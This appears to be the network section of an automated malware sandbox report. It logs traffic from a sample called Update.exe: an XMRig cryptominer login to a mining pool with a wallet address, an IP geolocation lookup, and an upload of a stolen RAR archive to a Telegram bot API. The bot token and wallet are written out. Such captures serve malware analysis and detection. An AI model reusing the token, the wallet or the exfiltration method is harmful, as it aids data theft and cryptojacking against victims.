                                                            Sep 9, 2024 06:31:33.428987980 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:31:53.291878939 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:31:53.335381985 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:32:14.989615917 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:32:15.038661003 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:32:37.156891108 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:32:37.210550070 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:32:59.167232037 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:32:59.210859060 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:33:01.098829985 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:33:01.148221016 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:33:21.158657074 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:33:21.210829973 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:33:38.976619959 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:33:39.023351908 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:33:58.951242924 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:33:58.992217064 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:34:21.160557985 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:34:21.211082935 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:34:42.986569881 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:34:43.039177895 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:35:04.961429119 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:35:05.008002043 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:35:06.727885962 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:35:06.773746014 CEST4974380192.168.2.445.76.89.70

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 9, 2024 06:31:19.072972059 CEST5290453192.168.2.41.1.1.1
                                                            Sep 9, 2024 06:31:19.080727100 CEST53529041.1.1.1192.168.2.4
                                                            Sep 9, 2024 06:31:26.240102053 CEST5916753192.168.2.41.1.1.1
                                                            Sep 9, 2024 06:31:26.248743057 CEST53591671.1.1.1192.168.2.4
                                                            Sep 9, 2024 06:31:27.061136007 CEST5303353192.168.2.41.1.1.1
                                                            Sep 9, 2024 06:31:27.067994118 CEST53530331.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 9, 2024 06:31:19.072972059 CEST192.168.2.41.1.1.10xafa9Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                            Sep 9, 2024 06:31:26.240102053 CEST192.168.2.41.1.1.10xa9caStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Sep 9, 2024 06:31:27.061136007 CEST192.168.2.41.1.1.10xdc0bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 9, 2024 06:31:19.080727100 CEST1.1.1.1192.168.2.40xafa9No error (0)pool.hashvault.pro45.76.89.70A (IP address)IN (0x0001)false
                                                            Sep 9, 2024 06:31:19.080727100 CEST1.1.1.1192.168.2.40xafa9No error (0)pool.hashvault.pro95.179.241.203A (IP address)IN (0x0001)false
                                                            Sep 9, 2024 06:31:26.248743057 CEST1.1.1.1192.168.2.40xa9caNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Sep 9, 2024 06:31:27.067994118 CEST1.1.1.1192.168.2.40xdc0bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • api.telegram.org
                                                            • ip-api.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.44974345.76.89.70807640C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 9, 2024 06:31:19.088500977 CEST590OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 37 35 58 6a 75 38 76 56 63 4a 50 31 52 56 71 51 62 4b 32 5a
                                                            Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4275Xju8vVcJP1RVqQbK2Z7GkZLGujw9JAXrN4DAkKTgeodnR4BTKauhEmWUJp3hsrKLEtey7vFHGFPp7yjeE8Q6QZVfkbP","pass":"","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022",
                                                            Sep 9, 2024 06:31:19.728723049 CEST731INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 38 31 34 61 37 61 63 30 2d 30 38 35 61 2d 34 36 35 63 2d 62 39 30 37 2d 37 37 38 37 34
                                                            Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"814a7ac0-085a-465c-b907-7787452b1fed","job":{"blob":"10108ef4f9b606b400fa6ebb5816a1751beb0f0e53b87fe365bade231e1aef1cc95b52f6e655f800000000bc03c84e45d5278ef23a60bd6fb0497fe140e9997719bdd219b
                                                            Sep 9, 2024 06:31:32.982774019 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 34 66 34 66 39 62 36 30 36 62 34 30 30 66 61 36 65 62 62 35 38 31 36 61 31 37 35
                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a4f4f9b606b400fa6ebb5816a1751beb0f0e53b87fe365bade231e1aef1cc95b52f6e655f800000000f233f1beeb2d09899744fa535b4fe859d951651487e0ba90ca652b919de8c2400c","job_id":"84e1bc92-f36f-4876-858b-b23b1
                                                            Sep 9, 2024 06:31:33.302229881 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 35 66 34 66 39 62 36 30 36 31 66 35 34 37 62 30 65 39 35 37 66 37 64 64 39 38 30
                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a5f4f9b6061f547b0e957f7dd98038690e0e477766251c6f5e5225b25e10ad24946c14fefb00000000254f5f1ce2545a40093d51481d58e0939b165c8a2ad6a100a99f2fde52e924aa01","job_id":"2822f4e0-f306-4730-b13f-06b2c
                                                            Sep 9, 2024 06:31:53.291878939 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 38 66 34 66 39 62 36 30 36 32 35 66 34 34 63 64 36 33 33 37 65 62 66 61 32 61 63
                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b8f4f9b60625f44cd6337ebfa2ac3e185cd2cd1a687be134c9d1c33d6a7ccbdb97bcd9d51200000000c43087aaf4092bf5e98b076bb5a3146627c59ebaaf2e8de0915e94f8d35e4bec06","job_id":"bde42466-b7ce-4aef-92f7-96e00
                                                            Sep 9, 2024 06:32:14.989615917 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 65 66 34 66 39 62 36 30 36 32 35 66 34 34 63 64 36 33 33 37 65 62 66 61 32 61 63
                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cef4f9b60625f44cd6337ebfa2ac3e185cd2cd1a687be134c9d1c33d6a7ccbdb97bcd9d5120000000049a4aff5e9c9fc4a0f5f1469bb501164532589456c54b6d51ec66221d35493640a","job_id":"a2098c8a-4169-4c1f-b739-6787a
                                                            Sep 9, 2024 06:32:37.156891108 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 34 66 34 66 39 62 36 30 36 32 35 66 34 34 63 64 36 33 33 37 65 62 66 61 32 61 63
                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e4f4f9b60625f44cd6337ebfa2ac3e185cd2cd1a687be134c9d1c33d6a7ccbdb97bcd9d51200000000de06930ae3d6d02ef796e1e5d3062ce9e143eff85713c1350fcc51b36bf8bd300c","job_id":"beb2b39b-ca4b-4cd1-8cce-d17eb
                                                            Sep 9, 2024 06:32:59.167232037 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 61 66 34 66 39 62 36 30 36 32 35 66 34 34 63 64 36 33 33 37 65 62 66 61 32 61 63
                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010faf4f9b60625f44cd6337ebfa2ac3e185cd2cd1a687be134c9d1c33d6a7ccbdb97bcd9d512000000007c8485a27eff67ab927da9ce9d02ee7f7e628276de9a63e70419a62d5da14e2813","job_id":"249ddc05-4fec-4571-a7a0-dcc94
                                                            Sep 9, 2024 06:33:01.098829985 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 61 66 34 66 39 62 36 30 36 32 35 66 34 34 63 64 36 33 33 37 65 62 66 61 32 61 63
                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010faf4f9b60625f44cd6337ebfa2ac3e185cd2cd1a687be134c9d1c33d6a7ccbdb97bcd9d51200000000cad65fdb4d1d9a40b074b47dc1b8c56acedd24d8ddb9931feda2291ffff7959013","job_id":"08124b43-d425-44a1-8216-bd147
                                                            Sep 9, 2024 06:33:21.158657074 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 30 66 35 66 39 62 36 30 36 32 35 66 34 34 63 64 36 33 33 37 65 62 66 61 32 61 63
                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101090f5f9b60625f44cd6337ebfa2ac3e185cd2cd1a687be134c9d1c33d6a7ccbdb97bcd9d5120000000061f676abc0390c580050d4af0964495179808633c94b7167696ac078e6d797dc17","job_id":"c2d25b33-0d2e-4ef9-a875-4a6f8


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449744208.95.112.1801184C:\Users\user\Desktop\Update.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 9, 2024 06:31:26.254575968 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                            Host: ip-api.com
                                                            Accept-Encoding: identity
                                                            User-Agent: python-urllib3/2.2.2
                                                            Sep 9, 2024 06:31:26.798688889 CEST379INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Sep 2024 04:31:26 GMT
                                                            Content-Type: application/json; charset=utf-8
                                                            Content-Length: 202
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449745149.154.167.2204431184C:\Users\user\Desktop\Update.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-09 04:31:27 UTC268OUTPOST /bot5909479554:AAHBh0elmAGqD01xNsl_4RAIClCAhxA3CaI/sendDocument HTTP/1.1
                                                            Host: api.telegram.org
                                                            Accept-Encoding: identity
                                                            Content-Length: 759987
                                                            User-Agent: python-urllib3/2.2.2
                                                            Content-Type: multipart/form-data; boundary=0974d66c08e6057af1c13b6cab35cb83
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: 2d 2d 30 39 37 34 64 36 36 63 30 38 65 36 30 35 37 61 66 31 63 31 33 62 36 63 61 62 33 35 63 62 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 58 73 18 c7 21 04 00 00 01 0f fd 47 60 a1 c3 60 4e a3 1c 7c d9 2e 7b 6d 91 95 16 5a 02 6f ad 13 32 0d 4e 1c 1f 15 7a 87 d1 75 1f 1c 58 d0 49 d3 bf 21 ce dd 0b 3b be 80 1c fd b4 82 33 51 ab e2 a7 09 c2 58 05 ef 9d 7e 20 a8 ec ad 3a d4 2b 92 6e 69 5f 76 72 ba c2 c1 a3 da bf 80
                                                            Data Ascii: --0974d66c08e6057af1c13b6cab35cb83Content-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!Xs!G``N|.{mZo2NzuXI!;3QX~ :+ni_vr
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: 62 f2 b5 ba 02 ed f3 9a f5 d9 12 0f ec c3 16 ca af 75 e6 8b 25 b9 29 5a 22 3e ba 5a e7 88 72 fd c5 dc f9 cf b5 7d fe 26 43 50 50 25 bf 13 1f 4d de d8 29 2a e8 7b 58 ce e8 e6 9f c5 99 c4 10 a8 12 d5 74 f8 e0 6c 6b 2e be 71 7c fb 34 a2 ab 21 6a 04 61 44 95 38 87 32 a5 ba 24 b8 d6 7b 21 c6 d1 51 56 d5 12 af 5e 0e 24 9a de 90 a2 34 a7 a7 5f 9b 60 e7 3e c6 f5 58 72 56 d2 6b 78 58 1d 88 dc cf 18 ea 1c b4 d3 15 91 4c 44 e7 9f d2 5d 95 76 b6 09 19 81 bf fd b4 26 57 2c 7a 32 e6 eb 1d 6d 60 4b b3 42 3f 6e 8e 22 95 85 32 df 0e 29 f1 2b d2 e7 c8 dc 98 f2 45 2d 15 60 74 b1 73 a0 e6 23 9e 4a 1e 32 44 63 a1 b2 bb 5d 21 3a af b6 70 d4 d4 e3 8c 47 60 15 c4 74 2a 39 54 11 77 ad 14 ce 95 29 ab d9 70 f7 3e c7 70 45 b3 b8 e2 ca fa d2 7e a0 da 2a bf 2e 69 d2 2e f2 11 28 eb 83
                                                            Data Ascii: bu%)Z">Zr}&CPP%M)*{Xtlk.q|4!jaD82${!QV^$4_`>XrVkxXLD]v&W,z2m`KB?n"2)+E-`ts#J2Dc]!:pG`t*9Tw)p>pE~*.i.(
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: ee 3d f9 f2 30 ac 59 35 b8 6d 98 47 30 41 21 9c e6 63 d7 3b 44 9d 30 88 8f 96 5c 41 6e 33 a9 4f 9d 38 d8 c8 1c 3b c2 05 dc fa 9e ff cc 91 63 9b 19 d0 60 33 bd 56 30 c1 a2 c2 28 b7 7d 79 fd ec 3e 3d 80 49 c3 65 c5 80 85 b0 04 a3 e2 0a 0c 4f 05 50 18 77 a7 4a 4b f5 bf a3 66 5b b7 59 4a 30 d0 63 2d 8d 73 fb 4d 80 1b 26 cc f2 07 24 d3 31 0c 62 bf c1 c0 3a 41 27 dd 89 f9 e8 36 19 12 bb 93 2d 39 e3 1b 03 77 3b 15 83 6d 28 55 a2 a9 2b 18 cc 62 52 a1 ea 12 81 52 88 14 ad 74 8f b8 7b ef c4 ce 37 69 69 d3 97 92 ae b9 8b cf 50 55 17 94 fb 51 9b ab db d7 21 ec d8 cd 5b 4e 46 7d 82 c5 14 b2 d1 78 d2 92 f7 81 ac e6 6c cd a1 30 4c 98 31 18 60 fe 95 a5 be 62 50 63 e0 5e 08 72 0d cb 1c 09 00 65 e3 a3 83 fc 2e 46 e3 62 77 cb db 7d 43 ee 29 e8 a2 66 49 e3 80 4b 03 d2 0d 0a
                                                            Data Ascii: =0Y5mG0A!c;D0\An3O8;c`3V0(}y>=IeOPwJKf[YJ0c-sM&$1b:A'6-9w;m(U+bRRt{7iiPUQ![NF}xl0L1`bPc^re.Fbw}C)fIK
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: 55 4f 55 a4 fb 61 f4 05 c2 14 d3 96 e1 88 a6 0e 0f a2 a7 5b fa a8 f7 35 ac 86 28 6e 07 2b 67 f5 3b 80 47 01 a7 08 ec 96 b6 50 38 3f 0c 3c 45 d7 ee 22 ca 3a 6d 56 d5 27 46 0f bb 35 40 9e 41 57 57 66 fb 60 36 1d 95 8f c7 4f d2 95 5d 95 9c 8e 6f 90 5f 27 b8 af 7e 99 ec 18 b7 b6 51 40 fb e1 1a 67 45 ec 9a b7 f1 db 48 87 f8 41 8c 55 37 1f ba 22 37 db df ee 16 ef 75 30 e0 ab 94 04 5b a6 6e e3 9a 7e 5a 62 09 5b f5 31 96 3c 64 2f 97 d8 39 a3 ce 04 4b fd 9c d7 75 64 03 4a a8 a8 29 a2 8d d5 ab 52 69 fd 85 f0 15 2f db 81 cf 22 5d 54 42 74 d5 8e 0a 91 2b 5f 75 05 8b f9 45 b0 31 0c 84 f5 57 40 b0 17 d0 77 55 0b 1d 1f bc 84 c7 6d 7a 07 08 9c 20 cf ce b2 ce a5 4a 60 0d 54 28 92 25 41 26 ad 73 fc 09 04 df ea d6 4f 63 c9 67 27 ec 74 90 c4 9d a1 10 72 84 03 b2 5e dc f0 1a
                                                            Data Ascii: UOUa[5(n+g;GP8?<E":mV'F5@AWWf`6O]o_'~Q@gEHAU7"7u0[n~Zb[1<d/9KudJ)Ri/"]TBt+_uE1W@wUmz J`T(%A&sOcg'tr^
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: 03 94 80 a2 0a 3b 09 d7 ac ce 25 a4 58 02 0c 62 5b 17 b5 24 33 b7 4e 81 11 da 20 c9 c3 fd d8 80 86 b2 9f 28 0b 6d f9 3d 7d 28 d2 58 45 90 0e f7 3f b9 63 06 b1 ed c7 5e ed b0 36 5a 8e cb e7 67 82 33 6b a9 62 ad 01 dd 32 dd 4f d1 8a 7a d5 32 00 6a 5e bc 3b a3 c2 8a 25 60 33 f1 76 a8 8e 84 06 20 f1 91 e0 e9 32 e1 01 56 b3 02 5f 93 dd 5a b7 0d af 1a 92 23 f8 6d 84 60 fa 28 57 44 f6 dc b2 63 48 40 6b 24 a1 12 d3 56 33 46 47 0c a3 bf be 2a 20 fe f7 f3 da 49 23 08 22 1e 4d 50 1f fa 56 55 12 bf 7b d8 17 7c 6f 0f a1 08 39 2a 2d 6c 80 6e 1b d7 e0 c3 b9 55 7e a3 52 d2 bc 0a 96 1f ec d2 2d d3 a5 67 94 f5 ac f3 6f bc 13 1c a2 3a 77 fa 9d a5 d4 4f dd c4 c7 05 12 7d 91 b1 ca 9e 23 4d e2 c5 b7 7a 02 5f 92 2d cb dc 20 3c 06 25 21 b2 ac e7 19 55 dd 08 8c c8 5d 1e 55 cb db
                                                            Data Ascii: ;%Xb[$3N (m=}(XE?c^6Zg3kb2Oz2j^;%`3v 2V_Z#m`(WDcH@k$V3FG* I#"MPVU{|o9*-lnU~R-go:wO}#Mz_- <%!U]U
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: cf c2 b9 66 74 e5 71 27 0e 6e 35 79 b0 c9 20 93 93 d2 ab f9 7d 08 47 9b 48 03 d5 ee db 75 ff 46 5e 93 7b b5 7f 3d a4 73 7b f5 d8 e7 41 55 df d1 9c bd 7b c8 bc c6 c7 0f aa 4c c4 5e cf 1c 77 d0 eb 6c a0 ec 76 2a 0a fb 08 ce a5 e1 78 3d 56 65 0f eb 19 c1 9a 76 ac 21 df 0e 7c a2 cb b5 eb 21 01 5a b1 13 71 dc 0a 6a c3 59 2c 2a bc d5 b1 18 42 20 01 f2 2e 38 0e 09 c2 98 f0 f6 be 72 bc de 3e e3 ef f9 fe 3a df df ad 4d 45 5f f0 27 51 74 56 76 47 e2 13 32 40 67 b0 61 91 0c 12 64 8a 2a c9 9d 71 67 50 94 0d a9 fb 7d 73 b3 95 1b 19 e4 b7 89 11 96 fe ef 22 4e c8 83 5f 0b 6b 87 74 df 1b 59 ce c8 63 33 4b 9e 2d 82 2b a1 d6 ab 15 7a 38 f6 85 c7 0e a9 c6 68 9a c6 90 be c2 49 67 36 2e 50 5f 16 be d3 f7 32 a0 bc aa 49 2d b2 66 4b 05 03 2a 72 45 88 d7 2d c3 5d 55 2d 16 a1 b7
                                                            Data Ascii: ftq'n5y }GHuF^{=s{AU{L^wlv*x=Vev!|!ZqjY,*B .8r>:ME_'QtVvG2@gad*qgP}s"N_ktYc3K-+z8hIg6.P_2I-fK*rE-]U-
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: ec 9f a9 e6 98 d8 1d 25 b3 98 69 16 85 96 e0 66 98 ba 36 61 45 73 b4 5d bd 73 0b 78 49 a1 f6 ed b4 8b 6e 3a a9 ab dd b3 53 a1 b4 df 73 7b 46 a2 66 14 59 8d fa fd f1 54 19 33 34 43 10 cb 6d 01 7c 7b 37 91 6e 2b d9 c7 f7 bb f7 57 77 ce 7a e4 4c 56 cd 80 fe 29 d9 89 ae fc e2 13 d2 e2 0d 5c dc 2e b7 8a ab b5 32 cf 31 3f 0a eb 0b 72 cb b2 83 74 ea 0b dc a8 d0 19 49 bb 40 ed ae 19 58 4b b4 2a 93 1a 0a 0d 09 e4 fe 27 63 9c 15 e9 d7 b9 d8 0d de b7 11 c8 f7 3c 0b 25 7b 89 0d 89 9a 16 57 37 4e 88 61 2b 5a 40 fd ea 35 49 2c 52 48 d5 83 2c 73 bf 73 ea bf 95 1c 12 4b b8 36 04 a8 11 ea cd f9 35 e2 3e f3 22 45 20 38 a2 76 3a 2f da 16 ee 08 50 6f c6 28 ba 87 da 86 22 df f4 2d 84 ef 52 a7 79 5c eb 2c 8c 71 62 38 b6 f6 6a b0 66 83 0a d0 84 af 53 82 46 70 b7 37 e4 bc 3b 07
                                                            Data Ascii: %if6aEs]sxIn:Ss{FfYT34Cm|{7n+WwzLV)\.21?rtI@XK*'c<%{W7Na+Z@5I,RH,ssK65>"E 8v:/Po("-Ry\,qb8jfSFp7;
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: 92 bf 2a 1e 70 74 81 b5 b8 2d 59 2e 78 58 5c da 5a 12 ac 9a 06 24 cb 20 b4 b0 18 e2 c1 7d 3d 62 05 3e aa 35 0f 62 ba e3 f4 98 ee 56 40 02 23 5f bb 6f e9 ff 1e 4c 6f 41 97 1b 9a 89 85 06 e9 25 54 ee 28 65 e7 09 69 dc e1 f2 25 ca 8a 40 ef e4 d7 d7 f3 0d 56 5d 67 b1 98 d2 0a 80 35 6b 9c a0 4c 8f 61 f0 5f 02 8d 7f 57 e5 69 20 6d 4a bb 8a 76 91 d9 b6 95 64 95 34 40 86 21 c8 02 18 23 a1 2c 16 b2 bd b7 49 b6 ae 0d d9 74 17 43 88 ff 18 ab 5b 87 25 fb 38 e6 a0 37 07 d8 e3 50 fe 52 5e f8 dd a5 56 7c 15 13 90 6c 6a 8c cf 1f 72 80 43 b5 1e 62 77 a9 e0 c5 3e 88 a4 a8 37 6e 27 03 85 68 60 08 b9 9c da c6 54 60 ef e8 f4 26 6d ef e0 af 6b 11 41 2d 95 93 d4 9e 68 20 a8 6b 7b 42 29 c2 86 04 c0 4c 4c 69 fd f8 d5 ee a1 56 44 51 a5 dc e7 cb c3 4e 47 a9 e1 6b 73 89 ac 64 5a 3c
                                                            Data Ascii: *pt-Y.xX\Z$ }=b>5bV@#_oLoA%T(ei%@V]g5kLa_Wi mJvd4@!#,ItC[%87PR^V|ljrCbw>7n'h`T`&mkA-h k{B)LLiVDQNGksdZ<
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: 43 cf 61 ea 6d bc 17 91 34 4d 0d fb 53 d4 f9 48 b8 4f ef 9b 51 50 70 79 8f ee ca 7d 11 a2 d3 cf 88 26 2e c3 6f 32 5d 88 21 fc bf 41 d0 f1 06 9c 4e 70 80 e0 c5 80 dd 33 73 69 0b 39 69 84 8e 82 f9 0d 6e ab 99 99 39 b8 7c ba c4 91 fd d2 2d a9 6a 86 a0 b6 89 d5 a3 29 d2 58 72 4d b2 58 94 9d 32 e3 47 a1 b9 77 73 67 d7 61 b2 db 26 55 e9 cf 56 a2 b1 77 92 ba bd ff a5 07 21 39 ff 7a 30 d3 1c 86 c3 4d 02 45 bf 89 2a 3a 2a 55 cc be 39 d4 4e 7e 58 c7 4a 07 0a d3 69 fd dc fb 38 9e 44 2c a7 cf 91 59 3a 61 12 2c 45 b6 48 19 ff f2 b0 16 ce a2 4c f2 03 8b ae d3 dc 83 d7 fb 48 12 6e c5 20 29 38 87 c9 11 92 ae ef 72 bc 77 aa 5b 0f 2e d4 33 5f 88 e4 d0 bb 7a 67 e0 fb 3e f8 2d 48 d1 c7 3a 77 16 06 9c 74 98 18 99 29 14 47 f2 5d dd 3d db 03 05 64 b8 a4 5a e2 a8 d4 bc 10 49 c3
                                                            Data Ascii: Cam4MSHOQPpy}&.o2]!ANp3si9in9|-j)XrMX2Gwsga&UVw!9z0ME*:*U9N~XJi8D,Y:a,EHLHn )8rw[.3_zg>-H:wt)G]=dZI
                                                            2024-09-09 04:31:27 UTC16384OUTData Raw: ba 97 89 2d 2e d8 b7 3e 0e 6d 4a 84 14 11 10 6a 93 7d 9e e6 5f 57 e5 19 fb bc 91 e8 d3 d2 ec 13 00 72 6f 72 75 a7 4f 7c 97 c5 ec c5 9f 8c 0f 99 88 05 60 6f f9 70 4e de 96 43 34 6f 25 5e 63 11 ae 6e d9 83 f6 35 5e ce 24 4d 84 87 e1 77 37 61 22 63 d5 b5 58 d6 00 95 e0 63 30 b3 bb 82 79 d3 9b 21 8f 1a 8c d4 85 3a 17 61 86 c0 60 c7 21 26 d4 b0 22 0f 2b 57 3b 41 c9 70 cc 84 2f 19 f7 10 e5 91 9f 7f d5 ae 30 de 88 f5 3c e8 0e 35 85 d0 ac e8 48 ce ad 18 a2 a1 71 56 e7 52 75 87 48 12 c7 2a 46 04 d3 98 b4 0c 4c 20 24 f6 5b 2e 71 08 db 2c 94 d4 ef 08 87 41 82 81 4e fc ab 89 08 20 5b 2e 67 d0 b5 da 66 f1 45 56 ef e9 3e da 2f 08 6b cb df c1 b2 c5 ca 1c eb f9 2e 06 5b 34 48 8a 7f 3e 85 75 fb b8 f3 4d 80 06 40 73 da d8 8f b8 c0 86 a9 a9 96 9a e6 89 ad e0 1c 43 22 d0 09
                                                            Data Ascii: -.>mJj}_WroruO|`opNC4o%^cn5^$Mw7a"cXc0y!:a`!&"+W;Ap/0<5HqVRuH*FL $[.q,AN [.gfEV>/k.[4H>uM@sC"
